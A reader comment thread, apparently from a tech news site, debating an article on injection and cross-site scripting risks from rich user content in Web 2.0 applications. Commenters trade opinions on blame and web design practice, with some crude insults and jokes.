All web applications allow some form of rich data, but that rich data has become a key part of Web 2.0. Data is "rich" if it allows markup, special characters, images, formatting, and other complex syntax. This richness allows users create new and innovative content and services. Unfortunately, richness affords attackers an …
Why is this news?
See title. Is there anyone sitting here reading this saying "Wow - hadn't looked at it like that before?"
Paris, because even she's aware of the dangers of someone inserting something they shouldn't.
RE: Why is this news?
Because, believe it or not, injection vulnerabilities are still pervasive all around the Web.
You May As Well Fireproof A Paper House
What else is there to say?
swings and roundabouts
the only way to truely fight security risk imo is education of joe public 'look at me ive got an apple' i.t. retards - aka 99% of the world population. as this will never happen (joe public doesnt care and is too stupid anyway) i suggest banning everyone from using computers until they can demonstrate how to use a computer responsibly (if ever).
Paris might be aware of the danger, but in the heat of the moment she hardly ever wears a wrapper and often reuses things in new and untied locations.
Why is this news - again?
Maybe because we don't learn - "don't mix data and code"! Maybe we even get self modifying code next that the user can send to systems? Sorry, seems that I'm a little slow today, we already have it - again! As long as the corporations or their minions buy whatever "new" and glorious technologies without any criteria - it will go on and on. Besides, it's not "rich data", it's "rich code" if there is anything that causes execution - and would someone give the official definition of Web 2.0 or a standards definition - I have been looking it now for a while, which RFC?
Blame users for XSS?
If Joe User browses a blog that has been infected via cross site scripting how is it his fault?
He is probably a regular user of hte site and has not experienced any problems in the past, he has no opertunity to examine the source code of the site to ensure inputs are properly validated and there are no flakey dynamic SQL statements. He could possibly run a suite of test programs against the site to check for security vulnerabilities - but could face criminal charges for doing so.
The current crop of malware goes way beyond the "click here to see pictures of nude tennis star" in terms of sophistication and stealth.
So this one really is down to ISPs and web site deveoplers to get thier act together.
So far the only real protection you can get is AVGs nifty page scanner - the one that has ISPs and web site owners screaming because it scans links before you click them and doubles thier traffic.
Blame the *users*? Blame the USERS? Furrfu...
How is it the user's fault that "web developers" are, for the most part, incompetent knuckle-dragging buffoons. Should users be expected to retrieve and peruse the source (including all the scripts, stylesheets, embedded images, Flash videos, PDFs, QuickTime movies and all the other crap that gets embedded into HTML documents nowadays) for each page and identify whether there may be security issues with it before opening it in a browser? Is it really too much to ask to expect people who are (nominally at least) professional programmers to actually have at least the rudiments of a clue about the job?
I suggest banning Register readers from commenting until they can demonstrate how to comment sensibly (if ever).
Web 2.0 is a Mega Fail -- this whole SUBJECT is dumb.
Hear me out.
Listen, you want to know how to do a proper website? It's easy. I've been doing it for over ten years. Try this on for size:
1) All code belongs on the server side. Use an OOP language like Java or C#. Ideally, you should separate out your database-touching code on an app server behind an extra firewall (you want at least 3 tiers, plus the user's browser). If you're a tiny shop on a hosting service, and all you've got is the web tier and a database, you've got to make do with that. Pick a hosting service that uses Unix, it's generally a little safer. Your server side code should accept the user's inputs, then validate them (don't forget that part!), formulate a response and send an assembled web page back to the browser. This means the browser only sees static pages, which makes it friendlier to a wide variety of browsers and screen readers (for the blind) as well.
3) If you really MUST have an interactive website, like for example, if you're doing a movie ad, do it in Flash, and have it only display static data you've staged in the browser. Flash is ideal for MOVIES, and MUSIC and GAMES. For everything else it's a complete waste of time and it locks out the blind and people with alternative browsers so it's not very socially friendly.
4) Whenever someone in your office starts talking about Ajax or Web 2.0, BITCH SLAP HIM. Explain that it's for his own good and you're only trying to help, then ask him if the feeling has passed. If he hasn't been cured yet, repeat as necessary.
The web is a mature medium, with many established, safe practices. Try adhering to what's been proven to work, and stop trying to change everything every couple of years!
Paris because... Well... She's cute, isn't she?
When, in #3, I said "If you really MUST have an interactive website" I meant "If you really MUST have a website that is interactive without the traditional post-to-server, refresh page approach". Sorry about that.
Obviously everything's interactive these days; otherwise you wouldn't NEED server-side code. The problem with AJAX is that designers want websites to act like desktop applications, and vendors are lining up in agreement (because they want to rent you software as a service in perpetuity instead of sell you software once). My position is that it's all snake oil being foisted on you for selfish reasons and you're better off doing it the old way.
Sorry for being unclear.